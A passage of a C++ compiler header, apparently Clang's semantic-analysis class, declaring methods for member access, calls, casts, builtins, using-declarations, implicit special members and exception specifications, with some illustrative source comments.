const TemplateArgumentListInfo *TemplateArgs,
const Scope *S,
ActOnMemberAccessExtraArgs *ExtraArgs = nullptr);
ExprResult
BuildMemberReferenceExpr(Expr *Base, QualType BaseType, SourceLocation OpLoc,
bool IsArrow, const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
NamedDecl *FirstQualifierInScope, LookupResult &R,
const TemplateArgumentListInfo *TemplateArgs,
const Scope *S,
bool SuppressQualifierCheck = false,
ActOnMemberAccessExtraArgs *ExtraArgs = nullptr);
ExprResult BuildFieldReferenceExpr(Expr *BaseExpr, bool IsArrow,
SourceLocation OpLoc,
const CXXScopeSpec &SS, FieldDecl *Field,
DeclAccessPair FoundDecl,
const DeclarationNameInfo &MemberNameInfo);
ExprResult PerformMemberExprBaseConversion(Expr *Base, bool IsArrow);
bool CheckQualifiedMemberReference(Expr *BaseExpr, QualType BaseType,
const CXXScopeSpec &SS,
const LookupResult &R);
ExprResult ActOnDependentMemberExpr(Expr *Base, QualType BaseType,
bool IsArrow, SourceLocation OpLoc,
const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
NamedDecl *FirstQualifierInScope,
const DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *TemplateArgs);
ExprResult ActOnMemberAccessExpr(Scope *S, Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
UnqualifiedId &Member,
Decl *ObjCImpDecl);
MemberExpr *
BuildMemberExpr(Expr *Base, bool IsArrow, SourceLocation OpLoc,
const CXXScopeSpec *SS, SourceLocation TemplateKWLoc,
ValueDecl *Member, DeclAccessPair FoundDecl,
bool HadMultipleCandidates,
const DeclarationNameInfo &MemberNameInfo, QualType Ty,
ExprValueKind VK, ExprObjectKind OK,
const TemplateArgumentListInfo *TemplateArgs = nullptr);
MemberExpr *
BuildMemberExpr(Expr *Base, bool IsArrow, SourceLocation OpLoc,
NestedNameSpecifierLoc NNS, SourceLocation TemplateKWLoc,
ValueDecl *Member, DeclAccessPair FoundDecl,
bool HadMultipleCandidates,
const DeclarationNameInfo &MemberNameInfo, QualType Ty,
ExprValueKind VK, ExprObjectKind OK,
const TemplateArgumentListInfo *TemplateArgs = nullptr);
void ActOnDefaultCtorInitializers(Decl *CDtorDecl);
bool ConvertArgumentsForCall(CallExpr *Call, Expr *Fn,
FunctionDecl *FDecl,
const FunctionProtoType *Proto,
ArrayRef<Expr *> Args,
SourceLocation RParenLoc,
bool ExecConfig = false);
void CheckStaticArrayArgument(SourceLocation CallLoc,
ParmVarDecl *Param,
const Expr *ArgExpr);
/// ActOnCallExpr - Handle a call to Fn with the specified array of arguments.
/// This provides the location of the left/right parens and a list of comma
/// locations.
ExprResult ActOnCallExpr(Scope *S, Expr *Fn, SourceLocation LParenLoc,
MultiExprArg ArgExprs, SourceLocation RParenLoc,
Expr *ExecConfig = nullptr);
ExprResult BuildCallExpr(Scope *S, Expr *Fn, SourceLocation LParenLoc,
MultiExprArg ArgExprs, SourceLocation RParenLoc,
Expr *ExecConfig = nullptr,
bool IsExecConfig = false);
enum class AtomicArgumentOrder { API, AST };
ExprResult
BuildAtomicExpr(SourceRange CallRange, SourceRange ExprRange,
SourceLocation RParenLoc, MultiExprArg Args,
AtomicExpr::AtomicOp Op,
AtomicArgumentOrder ArgOrder = AtomicArgumentOrder::API);
ExprResult
BuildResolvedCallExpr(Expr *Fn, NamedDecl *NDecl, SourceLocation LParenLoc,
ArrayRef<Expr *> Arg, SourceLocation RParenLoc,
Expr *Config = nullptr, bool IsExecConfig = false,
ADLCallKind UsesADL = ADLCallKind::NotADL);
ExprResult ActOnCUDAExecConfigExpr(Scope *S, SourceLocation LLLLoc,
MultiExprArg ExecConfig,
SourceLocation GGGLoc);
ExprResult ActOnCastExpr(Scope *S, SourceLocation LParenLoc,
Declarator &D, ParsedType &Ty,
SourceLocation RParenLoc, Expr *CastExpr);
ExprResult BuildCStyleCastExpr(SourceLocation LParenLoc,
TypeSourceInfo *Ty,
SourceLocation RParenLoc,
Expr *Op);
CastKind PrepareScalarCast(ExprResult &src, QualType destType);
/// Build an AltiVec or OpenCL vector literal.
ExprResult BuildVectorLiteral(SourceLocation LParenLoc,
SourceLocation RParenLoc, Expr *E,
TypeSourceInfo *TInfo);
ExprResult MaybeConvertParenListExprToParenExpr(Scope *S, Expr *ME);
ExprResult ActOnCompoundLiteral(SourceLocation LParenLoc,
ParsedType Ty,
SourceLocation RParenLoc,
Expr *InitExpr);
ExprResult BuildCompoundLiteralExpr(SourceLocation LParenLoc,
TypeSourceInfo *TInfo,
SourceLocation RParenLoc,
Expr *LiteralExpr);
ExprResult ActOnInitList(SourceLocation LBraceLoc,
MultiExprArg InitArgList,
SourceLocation RBraceLoc);
ExprResult BuildInitList(SourceLocation LBraceLoc,
MultiExprArg InitArgList,
SourceLocation RBraceLoc);
ExprResult ActOnDesignatedInitializer(Designation &Desig,
SourceLocation EqualOrColonLoc,
bool GNUSyntax,
ExprResult Init);
private:
static BinaryOperatorKind ConvertTokenKindToBinaryOpcode(tok::TokenKind Kind);
public:
ExprResult ActOnBinOp(Scope *S, SourceLocation TokLoc,
tok::TokenKind Kind, Expr *LHSExpr, Expr *RHSExpr);
ExprResult BuildBinOp(Scope *S, SourceLocation OpLoc,
BinaryOperatorKind Opc, Expr *LHSExpr, Expr *RHSExpr);
ExprResult CreateBuiltinBinOp(SourceLocation OpLoc, BinaryOperatorKind Opc,
Expr *LHSExpr, Expr *RHSExpr);
void DiagnoseCommaOperator(const Expr *LHS, SourceLocation Loc);
/// ActOnConditionalOp - Parse a ?: operation. Note that 'LHS' may be null
/// in the case of the GNU conditional expr extension.
ExprResult ActOnConditionalOp(SourceLocation QuestionLoc,
SourceLocation ColonLoc,
Expr *CondExpr, Expr *LHSExpr, Expr *RHSExpr);
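// For illustration, the GNU extension mentioned above omits the middle
// operand (a source sketch, not code from this file):
//   int y = x ?: fallback(); // equivalent to x ? x : fallback(), with x evaluated once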
/// ActOnAddrLabel - Parse the GNU address of label extension: "&&foo".
ExprResult ActOnAddrLabel(SourceLocation OpLoc, SourceLocation LabLoc,
LabelDecl *TheDecl);
void ActOnStartStmtExpr();
ExprResult ActOnStmtExpr(Scope *S, SourceLocation LPLoc, Stmt *SubStmt,
SourceLocation RPLoc);
ExprResult BuildStmtExpr(SourceLocation LPLoc, Stmt *SubStmt,
SourceLocation RPLoc, unsigned TemplateDepth);
// Handle the final expression in a statement expression.
ExprResult ActOnStmtExprResult(ExprResult E);
void ActOnStmtExprError();
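// For illustration, a GNU statement expression whose final expression is the
// value produced and is handled by ActOnStmtExprResult (a source sketch, not
// code from this file):
//   int v = ({ int tmp = compute(); tmp + 1; }); // v = compute() + 1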
// __builtin_offsetof(type, identifier(.identifier|[expr])*)
struct OffsetOfComponent {
SourceLocation LocStart, LocEnd;
bool isBrackets; // true if [expr], false if .ident
union {
IdentifierInfo *IdentInfo;
Expr *E;
} U;
};
/// __builtin_offsetof(type, a.b[123][456].c)
ExprResult BuildBuiltinOffsetOf(SourceLocation BuiltinLoc,
TypeSourceInfo *TInfo,
ArrayRef<OffsetOfComponent> Components,
SourceLocation RParenLoc);
ExprResult ActOnBuiltinOffsetOf(Scope *S,
SourceLocation BuiltinLoc,
SourceLocation TypeLoc,
ParsedType ParsedArgTy,
ArrayRef<OffsetOfComponent> Components,
SourceLocation RParenLoc);
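// As a sketch of how the example above decomposes (illustration only):
// '__builtin_offsetof(T, a.b[123][456].c)' yields five OffsetOfComponent
// entries: '.a' and '.b' with isBrackets == false (U.IdentInfo set),
// '[123]' and '[456]' with isBrackets == true (U.E set), and finally '.c'
// with U.IdentInfo set again.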
// __builtin_choose_expr(constExpr, expr1, expr2)
ExprResult ActOnChooseExpr(SourceLocation BuiltinLoc,
Expr *CondExpr, Expr *LHSExpr,
Expr *RHSExpr, SourceLocation RPLoc);
// __builtin_va_arg(expr, type)
ExprResult ActOnVAArg(SourceLocation BuiltinLoc, Expr *E, ParsedType Ty,
SourceLocation RPLoc);
ExprResult BuildVAArgExpr(SourceLocation BuiltinLoc, Expr *E,
TypeSourceInfo *TInfo, SourceLocation RPLoc);
// __builtin_LINE(), __builtin_FUNCTION(), __builtin_FILE(),
// __builtin_COLUMN()
ExprResult ActOnSourceLocExpr(SourceLocExpr::IdentKind Kind,
SourceLocation BuiltinLoc,
SourceLocation RPLoc);
// Build a potentially resolved SourceLocExpr.
ExprResult BuildSourceLocExpr(SourceLocExpr::IdentKind Kind,
SourceLocation BuiltinLoc, SourceLocation RPLoc,
DeclContext *ParentContext);
// __null
ExprResult ActOnGNUNullExpr(SourceLocation TokenLoc);
bool CheckCaseExpression(Expr *E);
/// Describes the result of an "if-exists" condition check.
enum IfExistsResult {
/// The symbol exists.
IER_Exists,
/// The symbol does not exist.
IER_DoesNotExist,
/// The name is a dependent name, so the results will differ
/// from one instantiation to the next.
IER_Dependent,
/// An error occurred.
IER_Error
};
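// For illustration, the Microsoft extension these results classify (a source
// sketch, not code from this file):
//   template <typename T> void f(T t) {
//     __if_exists (T::size) { (void)t.size(); } // IER_Dependent until instantiation
//   }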
IfExistsResult
CheckMicrosoftIfExistsSymbol(Scope *S, CXXScopeSpec &SS,
const DeclarationNameInfo &TargetNameInfo);
IfExistsResult
CheckMicrosoftIfExistsSymbol(Scope *S, SourceLocation KeywordLoc,
bool IsIfExists, CXXScopeSpec &SS,
UnqualifiedId &Name);
StmtResult BuildMSDependentExistsStmt(SourceLocation KeywordLoc,
bool IsIfExists,
NestedNameSpecifierLoc QualifierLoc,
DeclarationNameInfo NameInfo,
Stmt *Nested);
StmtResult ActOnMSDependentExistsStmt(SourceLocation KeywordLoc,
bool IsIfExists,
CXXScopeSpec &SS, UnqualifiedId &Name,
Stmt *Nested);
//===------------------------- "Block" Extension ------------------------===//
/// ActOnBlockStart - This callback is invoked when a block literal is
/// started.
void ActOnBlockStart(SourceLocation CaretLoc, Scope *CurScope);
/// ActOnBlockArguments - This callback allows processing of block arguments.
/// If there are no arguments, this is still invoked.
void ActOnBlockArguments(SourceLocation CaretLoc, Declarator &ParamInfo,
Scope *CurScope);
/// ActOnBlockError - If there is an error parsing a block, this callback
/// is invoked to pop the information about the block from the action impl.
void ActOnBlockError(SourceLocation CaretLoc, Scope *CurScope);
/// ActOnBlockStmtExpr - This is called when the body of a block statement
/// literal was successfully completed. ^(int x){...}
ExprResult ActOnBlockStmtExpr(SourceLocation CaretLoc, Stmt *Body,
Scope *CurScope);
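// For illustration, a complete block literal of the form noted above (a
// source sketch, not code from this file):
//   int (^add)(int, int) = ^(int x, int y) { return x + y; };
//   int three = add(1, 2);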
//===---------------------------- Clang Extensions ----------------------===//
/// __builtin_convertvector(...)
ExprResult ActOnConvertVectorExpr(Expr *E, ParsedType ParsedDestTy,
SourceLocation BuiltinLoc,
SourceLocation RParenLoc);
//===---------------------------- OpenCL Features -----------------------===//
/// __builtin_astype(...)
ExprResult ActOnAsTypeExpr(Expr *E, ParsedType ParsedDestTy,
SourceLocation BuiltinLoc,
SourceLocation RParenLoc);
//===---------------------------- C++ Features --------------------------===//
// Act on C++ namespaces
Decl *ActOnStartNamespaceDef(Scope *S, SourceLocation InlineLoc,
SourceLocation NamespaceLoc,
SourceLocation IdentLoc, IdentifierInfo *Ident,
SourceLocation LBrace,
const ParsedAttributesView &AttrList,
UsingDirectiveDecl *&UsingDecl);
void ActOnFinishNamespaceDef(Decl *Dcl, SourceLocation RBrace);
NamespaceDecl *getStdNamespace() const;
NamespaceDecl *getOrCreateStdNamespace();
NamespaceDecl *lookupStdExperimentalNamespace();
CXXRecordDecl *getStdBadAlloc() const;
EnumDecl *getStdAlignValT() const;
private:
// A cache recording whether we've fully checked the various comparison category
// types stored in ASTContext. The bit-index corresponds to the integer value
// of a ComparisonCategoryType enumerator.
llvm::SmallBitVector FullyCheckedComparisonCategories;
ValueDecl *tryLookupCtorInitMemberDecl(CXXRecordDecl *ClassDecl,
CXXScopeSpec &SS,
ParsedType TemplateTypeTy,
IdentifierInfo *MemberOrBase);
public:
enum class ComparisonCategoryUsage {
/// The '<=>' operator was used in an expression and a builtin operator
/// was selected.
OperatorInExpression,
/// A defaulted 'operator<=>' needed the comparison category. This
/// typically only applies to 'std::strong_ordering', due to the implicit
/// fallback return value.
DefaultedOperator,
};
/// Lookup the specified comparison category types in the standard
/// library, and check the VarDecls possibly returned by the operator<=>
/// builtins for that type.
///
/// \return The type of the comparison category type corresponding to the
/// specified Kind, or a null type if an error occurs
QualType CheckComparisonCategoryType(ComparisonCategoryType Kind,
SourceLocation Loc,
ComparisonCategoryUsage Usage);
/// Tests whether Ty is an instance of std::initializer_list and, if
/// it is and Element is not NULL, assigns the element type to Element.
bool isStdInitializerList(QualType Ty, QualType *Element);
/// Looks for the std::initializer_list template and instantiates it
/// with Element, or emits an error if it's not found.
///
/// \returns The instantiated template, or null on error.
QualType BuildStdInitializerList(QualType Element, SourceLocation Loc);
/// Determine whether Ctor is an initializer-list constructor, as
/// defined in [dcl.init.list]p2.
bool isInitListConstructor(const FunctionDecl *Ctor);
Decl *ActOnUsingDirective(Scope *CurScope, SourceLocation UsingLoc,
SourceLocation NamespcLoc, CXXScopeSpec &SS,
SourceLocation IdentLoc,
IdentifierInfo *NamespcName,
const ParsedAttributesView &AttrList);
void PushUsingDirective(Scope *S, UsingDirectiveDecl *UDir);
Decl *ActOnNamespaceAliasDef(Scope *CurScope,
SourceLocation NamespaceLoc,
SourceLocation AliasLoc,
IdentifierInfo *Alias,
CXXScopeSpec &SS,
SourceLocation IdentLoc,
IdentifierInfo *Ident);
void HideUsingShadowDecl(Scope *S, UsingShadowDecl *Shadow);
bool CheckUsingShadowDecl(UsingDecl *UD, NamedDecl *Target,
const LookupResult &PreviousDecls,
UsingShadowDecl *&PrevShadow);
UsingShadowDecl *BuildUsingShadowDecl(Scope *S, UsingDecl *UD,
NamedDecl *Target,
UsingShadowDecl *PrevDecl);
bool CheckUsingDeclRedeclaration(SourceLocation UsingLoc,
bool HasTypenameKeyword,
const CXXScopeSpec &SS,
SourceLocation NameLoc,
const LookupResult &Previous);
bool CheckUsingDeclQualifier(SourceLocation UsingLoc,
bool HasTypename,
const CXXScopeSpec &SS,
const DeclarationNameInfo &NameInfo,
SourceLocation NameLoc);
NamedDecl *BuildUsingDeclaration(
Scope *S, AccessSpecifier AS, SourceLocation UsingLoc,
bool HasTypenameKeyword, SourceLocation TypenameLoc, CXXScopeSpec &SS,
DeclarationNameInfo NameInfo, SourceLocation EllipsisLoc,
const ParsedAttributesView &AttrList, bool IsInstantiation);
NamedDecl *BuildUsingPackDecl(NamedDecl *InstantiatedFrom,
ArrayRef<NamedDecl *> Expansions);
bool CheckInheritingConstructorUsingDecl(UsingDecl *UD);
/// Given a derived-class using shadow declaration for a constructor and the
/// corresponding base class constructor, find or create the implicit
/// synthesized derived class constructor to use for this initialization.
CXXConstructorDecl *
findInheritingConstructor(SourceLocation Loc, CXXConstructorDecl *BaseCtor,
ConstructorUsingShadowDecl *DerivedShadow);
Decl *ActOnUsingDeclaration(Scope *CurScope, AccessSpecifier AS,
SourceLocation UsingLoc,
SourceLocation TypenameLoc, CXXScopeSpec &SS,
UnqualifiedId &Name, SourceLocation EllipsisLoc,
const ParsedAttributesView &AttrList);
Decl *ActOnAliasDeclaration(Scope *CurScope, AccessSpecifier AS,
MultiTemplateParamsArg TemplateParams,
SourceLocation UsingLoc, UnqualifiedId &Name,
const ParsedAttributesView &AttrList,
TypeResult Type, Decl *DeclFromDeclSpec);
/// BuildCXXConstructExpr - Creates a complete call to a constructor,
/// including handling of its default argument expressions.
///
/// \param ConstructKind - a CXXConstructExpr::ConstructionKind
ExprResult
BuildCXXConstructExpr(SourceLocation ConstructLoc, QualType DeclInitType,
NamedDecl *FoundDecl,
CXXConstructorDecl *Constructor, MultiExprArg Exprs,
bool HadMultipleCandidates, bool IsListInitialization,
bool IsStdInitListInitialization,
bool RequiresZeroInit, unsigned ConstructKind,
SourceRange ParenRange);
/// Build a CXXConstructExpr whose constructor has already been resolved if
/// it denotes an inherited constructor.
ExprResult
BuildCXXConstructExpr(SourceLocation ConstructLoc, QualType DeclInitType,
CXXConstructorDecl *Constructor, bool Elidable,
MultiExprArg Exprs,
bool HadMultipleCandidates, bool IsListInitialization,
bool IsStdInitListInitialization,
bool RequiresZeroInit, unsigned ConstructKind,
SourceRange ParenRange);
// FIXME: Can we remove this and have the above BuildCXXConstructExpr check if
// the constructor can be elidable?
ExprResult
BuildCXXConstructExpr(SourceLocation ConstructLoc, QualType DeclInitType,
NamedDecl *FoundDecl,
CXXConstructorDecl *Constructor, bool Elidable,
MultiExprArg Exprs, bool HadMultipleCandidates,
bool IsListInitialization,
bool IsStdInitListInitialization, bool RequiresZeroInit,
unsigned ConstructKind, SourceRange ParenRange);
ExprResult BuildCXXDefaultInitExpr(SourceLocation Loc, FieldDecl *Field);
/// Instantiate or parse a C++ default argument expression as necessary.
/// Return true on error.
bool CheckCXXDefaultArgExpr(SourceLocation CallLoc, FunctionDecl *FD,
ParmVarDecl *Param);
/// BuildCXXDefaultArgExpr - Creates a CXXDefaultArgExpr, instantiating
/// the default expr if needed.
ExprResult BuildCXXDefaultArgExpr(SourceLocation CallLoc,
FunctionDecl *FD,
ParmVarDecl *Param);
/// FinalizeVarWithDestructor - Prepare for calling destructor on the
/// constructed variable.
void FinalizeVarWithDestructor(VarDecl *VD, const RecordType *DeclInitType);
/// Helper class that collects exception specifications for
/// implicitly-declared special member functions.
class ImplicitExceptionSpecification {
// Pointer to allow copying
Sema *Self;
// We order exception specifications thus:
// noexcept is the most restrictive, but is only used in C++11.
// throw() comes next.
// Then a throw(collected exceptions)
// Finally no specification, which is expressed as noexcept(false).
// throw(...) is used instead if any called function uses it.
ExceptionSpecificationType ComputedEST;
llvm::SmallPtrSet<CanQualType, 4> ExceptionsSeen;
SmallVector<QualType, 4> Exceptions;
void ClearExceptions() {
ExceptionsSeen.clear();
Exceptions.clear();
}
public:
explicit ImplicitExceptionSpecification(Sema &Self)
: Self(&Self), ComputedEST(EST_BasicNoexcept) {
if (!Self.getLangOpts().CPlusPlus11)
ComputedEST = EST_DynamicNone;
}
/// Get the computed exception specification type.
ExceptionSpecificationType getExceptionSpecType() const {
assert(!isComputedNoexcept(ComputedEST) &&
"noexcept(expr) should not be a possible result");
return ComputedEST;
}
/// The number of exceptions in the exception specification.
unsigned size() const { return Exceptions.size(); }
/// The set of exceptions in the exception specification.
const QualType *data() const { return Exceptions.data(); }
/// Integrate another called method into the collected data.
void CalledDecl(SourceLocation CallLoc, const CXXMethodDecl *Method);
/// Integrate an invoked expression into the collected data.
void CalledExpr(Expr *E) { CalledStmt(E); }
/// Integrate an invoked statement into the collected data.
void CalledStmt(Stmt *S);
/// Overwrite an EPI's exception specification with this
/// computed exception specification.
FunctionProtoType::ExceptionSpecInfo getExceptionSpec() const {
FunctionProtoType::ExceptionSpecInfo ESI;
ESI.Type = getExceptionSpecType();
if (ESI.Type == EST_Dynamic) {
ESI.Exceptions = Exceptions;
} else if (ESI.Type == EST_None) {
/// C++11 [except.spec]p14:
/// The exception-specification is noexcept(false) if the set of
/// potential exceptions of the special member function contains "any"
ESI.Type = EST_NoexceptFalse;
ESI.NoexceptExpr = Self->ActOnCXXBoolLiteral(SourceLocation(),
tok::kw_false).get();
}
return ESI;
}
};
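// A minimal usage sketch for the collector above (hypothetical; assumes a
// Sema instance 'S', a location 'Loc', and a range 'Methods' of methods the
// implicit special member would call):
//   Sema::ImplicitExceptionSpecification Spec(S);
//   for (const CXXMethodDecl *MD : Methods)
//     Spec.CalledDecl(Loc, MD);
//   FunctionProtoType::ExceptionSpecInfo ESI = Spec.getExceptionSpec();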
/// Determine what sort of exception specification a defaulted
/// default constructor of a class will have.
ImplicitExceptionSpecification
ComputeDefaultedDefaultCtorExceptionSpec(SourceLocation Loc,
CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted
/// copy constructor of a class will have, and whether the parameter
/// will be const.
ImplicitExceptionSpecification
ComputeDefaultedCopyCtorExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted
/// copy assignment operator of a class will have, and whether the
/// parameter will be const.
ImplicitExceptionSpecification
ComputeDefaultedCopyAssignmentExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted move
/// constructor of a class will have.
ImplicitExceptionSpecification
ComputeDefaultedMoveCtorExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted move
/// assignment operator of a class will have.
ImplicitExceptionSpecification
ComputeDefaultedMoveAssignmentExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted
/// destructor of a class will have.
ImplicitExceptionSpecification
ComputeDefaultedDtorExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification an inheriting
/// constructor of a class will have.
ImplicitExceptionSpecification
ComputeInheritingCtorExceptionSpec(SourceLocation Loc,
CXXConstructorDecl *CD);
/// Evaluate the implicit exception specification for a defaulted
/// special member function.
void EvaluateImplicitExceptionSpec(SourceLocation Loc, FunctionDecl *FD);
/// Check the given noexcept-specifier, convert its expression, and compute
/// the appropriate ExceptionSpecificationType.
ExprResult ActOnNoexceptSpec(SourceLocation NoexceptLoc, Expr *NoexceptExpr,
ExceptionSpecificationType &EST);
/// Check the given exception-specification and update the
/// exception specification information with the results.
void checkExceptionSpecification(bool IsTopLevel,
ExceptionSpecificationType EST,
ArrayRef<ParsedType> DynamicExceptions,
ArrayRef<SourceRange> DynamicExceptionRanges,
Expr *NoexceptExpr,
SmallVectorImpl<QualType> &Exceptions,
FunctionProtoType::ExceptionSpecInfo &ESI);
/// Determine if we're in a case where we need to (incorrectly) eagerly
/// parse an exception specification to work around a libstdc++ bug.
bool isLibstdcxxEagerExceptionSpecHack(const Declarator &D);
/// Add an exception-specification to the given member function
/// (or member function template). The exception-specification was parsed
/// after the method itself was declared.
void actOnDelayedExceptionSpecification(Decl *Method,
ExceptionSpecificationType EST,
SourceRange SpecificationRange,
ArrayRef<ParsedType> DynamicExceptions,
ArrayRef<SourceRange> DynamicExceptionRanges,
Expr *NoexceptExpr);
class InheritedConstructorInfo;
/// Determine if a special member function should have a deleted
/// definition when it is defaulted.
bool ShouldDeleteSpecialMember(CXXMethodDecl *MD, CXXSpecialMember CSM,
InheritedConstructorInfo *ICI = nullptr,
bool Diagnose = false);
/// Produce notes explaining why a defaulted function was defined as deleted.
void DiagnoseDeletedDefaultedFunction(FunctionDecl *FD);
/// Declare the implicit default constructor for the given class.
///
/// \param ClassDecl The class declaration into which the implicit
/// default constructor will be added.
///
/// \returns The implicitly-declared default constructor.
CXXConstructorDecl *DeclareImplicitDefaultConstructor(
CXXRecordDecl *ClassDecl);
/// DefineImplicitDefaultConstructor - Checks for feasibility of
/// defining this constructor as the default constructor.
void DefineImplicitDefaultConstructor(SourceLocation CurrentLocation,
CXXConstructorDecl *Constructor);
/// Declare the implicit destructor for the given class.
///
/// \param ClassDecl The class declaration into which the implicit
/// destructor will be added.
///
/// \returns The implicitly-declared destructor.
CXXDestructorDecl *DeclareImplicitDestructor(CXXRecordDecl *ClassDecl);
/// DefineImplicitDestructor - Checks for feasibility of
/// defining this destructor as the default destructor.
void DefineImplicitDestructor(SourceLocation CurrentLocation,
CXXDestructorDecl *Destructor);
/// Build an exception spec for destructors that don't have one.
///
/// C++11 says that user-defined destructors with no exception spec get one
/// that looks as if the destructor was implicitly declared.
void AdjustDestructorExceptionSpec(CXXDestructorDecl *Destructor);
/// Define the specified inheriting constructor.
void DefineInheritingConstructor(SourceLocation UseLoc,
CXXConstructorDecl *Constructor);
/// Declare the implicit copy constructor for the given class.
///
/// \param ClassDecl The class declaration into which the implicit
/// copy constructor will be added.
///
/// \returns The implicitly-declared copy constructor.
CXXConstructorDecl *DeclareImplicitCopyConstructor(CXXRecordDecl *ClassDecl);
/// DefineImplicitCopyConstructor - Checks for feasibility of
/// defining this constructor as the copy constructor.
void DefineImplicitCopyConstructor(SourceLocation CurrentLocation,
CXXConstructorDecl *Constructor);
/// Declare the implicit move constructor for the given class.
///
/// \param ClassDecl The class declaration into which the implicit
/// move constructor will be added.
///
/// \returns The implicitly-declared move constructor, or NULL if it wasn't
/// declared.
CXXConstructorDecl *DeclareImplicitMoveConstructor(CXXRecordDecl *ClassDecl);
/// DefineImplicitMoveConstructor - Checks for feasibility of
/// defining this constructor as the move constructor.
void DefineImplicitMoveConstructor(SourceLocation CurrentLocation,
CXXConstructorDecl *Constructor);
/// Declare the implicit copy assignment operator for the given class.
///
/// \param ClassDecl The class declaration into which the implicit
/// copy assignment operator will be added.
///
/// \returns The implicitly-declared copy assignment operator.
CXXMethodDecl *DeclareImplicitCopyAssignment(CXXRecordDecl *ClassDecl);
/// Defines an implicitly-declared copy assignment operator.
void DefineImplicitCopyAssignment(SourceLocation CurrentLocation,
CXXMethodDecl *MethodDecl);
/// Declare the implicit move assignment operator for the given class.
///
/// \param ClassDecl The class declaration into which the implicit
/// move assignment operator will be added.
///
/// \returns The implicitly-declared move assignment operator, or NULL if it
/// wasn't declared.
CXXMethodDecl *DeclareImplicitMoveAssignment(CXXRecordDecl *ClassDecl);
/// Defines an implicitly-declared move assignment operator.
void DefineImplicitMoveAssignment(SourceLocation CurrentLocation,
CXXMethodDecl *MethodDecl);
/// Force the declaration of any implicitly-declared members of this
/// class.
void ForceDeclarationOfImplicitMembers(CXXRecordDecl *Class);
/// Check a completed declaration of an implicit special member.
void CheckImplicitSpecialMemberDeclaration(Scope *S, FunctionDecl *FD);
/// Determine whether the given function is an implicitly-deleted
/// special member function.
bool isImplicitlyDeleted(FunctionDecl *FD);
/// Check whether 'this' shows up in the type of a static member
/// function after the (naturally empty) cv-qualifier-seq would be.
///
/// \returns true if an error occurred.
bool checkThisInStaticMemberFunctionType(CXXMethodDecl *Method);
/// Check whether 'this' shows up in the exception specification of a static
/// member function.
bool checkThisInStaticMemberFunctionExceptionSpec(CXXMethodDecl *Method);
/// Check whether 'this' shows up in the attributes of the given
/// static member function.
///
/// \returns true if an error occurred.
bool checkThisInStaticMemberFunctionAttributes(CXXMethodDecl *Method);
/// MaybeBindToTemporary - If the passed in expression has a record type with
/// a non-trivial destructor, this will return CXXBindTemporaryExpr. Otherwise
/// it simply returns the passed in expression.
ExprResult MaybeBindToTemporary(Expr *E);
/// Wrap the expression in a ConstantExpr if it is a potential immediate
/// invocation.
ExprResult CheckForImmediateInvocation(ExprResult E, FunctionDecl *Decl);
bool CompleteConstructorCall(CXXConstructorDecl *Constructor,
MultiExprArg ArgsPtr,
SourceLocation Loc,
SmallVectorImpl<Expr*> &ConvertedArgs,
bool AllowExplicit = false,
bool IsListInitialization = false);
ParsedType getInheritingConstructorName(CXXScopeSpec &SS,
SourceLocation NameLoc,
IdentifierInfo &Name);
ParsedType getConstructorName(IdentifierInfo &II, SourceLocation NameLoc,
Scope *S, CXXScopeSpec &SS,
bool EnteringContext);
ParsedType getDestructorName(SourceLocation TildeLoc,
IdentifierInfo &II, SourceLocation NameLoc,
Scope *S, CXXScopeSpec &SS,
ParsedType ObjectType,
bool EnteringContext);
ParsedType getDestructorTypeForDecltype(const DeclSpec &DS,
ParsedType ObjectType);
// Checks that reinterpret casts don't have undefined behavior.
void CheckCompatibleReinterpretCast(QualType SrcType, QualType DestType,
bool IsDereference, SourceRange Range);
/// ActOnCXXNamedCast - Parse {dynamic,static,reinterpret,const}_cast's.
ExprResult ActOnCXXNamedCast(SourceLocation OpLoc,
tok::TokenKind Kind,
SourceLocation LAngleBracketLoc,
Declarator &D,
SourceLocation RAngleBracketLoc,
SourceLocation LParenLoc,
Expr *E,
SourceLocation RParenLoc);
ExprResult BuildCXXNamedCast(SourceLocation OpLoc,
tok::TokenKind Kind,
TypeSourceInfo *Ty,
Expr *E,
SourceRange AngleBrackets,
SourceRange Parens);
ExprResult ActOnBuiltinBitCastExpr(SourceLocation KWLoc, Declarator &Dcl,
ExprResult Operand,
SourceLocation RParenLoc);
ExprResult BuildBuiltinBitCastExpr(SourceLocation KWLoc, TypeSourceInfo *TSI,
Expr *Operand, SourceLocation RParenLoc);
ExprResult BuildCXXTypeId(QualType TypeInfoType,
SourceLocation TypeidLoc,
TypeSourceInfo *Operand,
SourceLocation RParenLoc);
ExprResult BuildCXXTypeId(QualType TypeInfoType,
SourceLocation TypeidLoc,
Expr *Operand,
SourceLocation RParenLoc);
/// ActOnCXXTypeid - Parse typeid( something ).
ExprResult ActOnCXXTypeid(SourceLocation OpLoc,
SourceLocation LParenLoc, bool isType,
void *TyOrExpr,
SourceLocation RParenLoc);
ExprResult BuildCXXUuidof(QualType TypeInfoType,
SourceLocation TypeidLoc,
TypeSourceInfo *Operand,
SourceLocation RParenLoc);
ExprResult BuildCXXUuidof(QualType TypeInfoType,
SourceLocation TypeidLoc,
Expr *Operand,
SourceLocation RParenLoc);
/// ActOnCXXUuidof - Parse __uuidof( something ).
ExprResult ActOnCXXUuidof(SourceLocation OpLoc,
SourceLocation LParenLoc, bool isType,
void *TyOrExpr,
SourceLocation RParenLoc);
/// Handle a C++1z fold-expression: ( expr op ... op expr ).
ExprResult ActOnCXXFoldExpr(SourceLocation LParenLoc, Expr *LHS,
tok::TokenKind Operator,
SourceLocation EllipsisLoc, Expr *RHS,
SourceLocation RParenLoc);
ExprResult BuildCXXFoldExpr(SourceLocation LParenLoc, Expr *LHS,
BinaryOperatorKind Operator,
SourceLocation EllipsisLoc, Expr *RHS,
SourceLocation RParenLoc,
Optional<unsigned> NumExpansions);
ExprResult BuildEmptyCXXFoldExpr(SourceLocation EllipsisLoc,
BinaryOperatorKind Operator);
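// For illustration, the fold-expression forms these entry points handle
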